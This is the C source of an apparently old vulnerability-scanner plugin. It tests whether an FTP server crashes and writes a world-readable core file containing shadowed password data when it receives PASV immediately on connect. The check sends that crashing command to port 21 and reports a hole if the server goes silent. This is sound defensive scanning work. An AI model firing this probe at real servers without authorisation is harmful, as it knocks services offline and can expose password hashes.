/*
 * 
 * ftp_pasv_check
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>

#define NAME "ftp PASV on connect crashes the FTP server"
#define DESC "\
Some FTP servers dump core when they are issued \n\
a PASV command as soon as the client connects.\n\
The FTP server will write a world readable core file\n\
which contains portions of the shadowed password file.\n\
This flaw allows local users to obtain the shadowed\n\
password file.\n\
Risk factor: medium/high"
#define COPYRIGHT "no copyright"
#define SUMM "issues a PASV command upon the connection"



int get_pasv_address(int soc, struct sockaddr_in * addr);

PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
  plug_set_name(desc, NAME);
  plug_set_description(desc, DESC);
  plug_set_summary(desc, SUMM);
  plug_set_copyright(desc, COPYRIGHT);
  plug_set_category(desc, ACT_ATTACK);
  plug_set_family(desc, "FTP");
  return(0);
}
	


PlugExport int plugin_run(struct arglist * args);	
PlugExport int plugin_run(struct arglist * args)
{
 int soc;
 char * buf;
 int stop = 0;
 struct sockaddr_in addr;
 
 if(host_get_port_state(args, 21)<=0)return(0);
 soc = open_sock_tcp(args, 21);
 if(soc<0)return(-1);
 buf = emalloc(2048);
 while(strncmp(buf, "220 ", 4))
 {
 bzero(buf, 2048);
 recv_line(soc, buf, 2048);
 }
 
 bzero(buf, 2048);
 sprintf(buf, "PASV\n");
 send(soc, buf, strlen(buf), 0);
 bzero(buf, 2048);
 recv(soc, buf, 2048, 0);
 if(!strlen(buf))
   {
     post_hole(args, 21, "\
The remote FTP server crashes when the client\n\
issues a PASV command directly on connecting,\n\
and it's very likely that it dumped its core\n\
on the remote root directory.\n\
Solution : upgrade");
   }
 shutdown(soc, 2);
 close(soc);
 return(0);
}

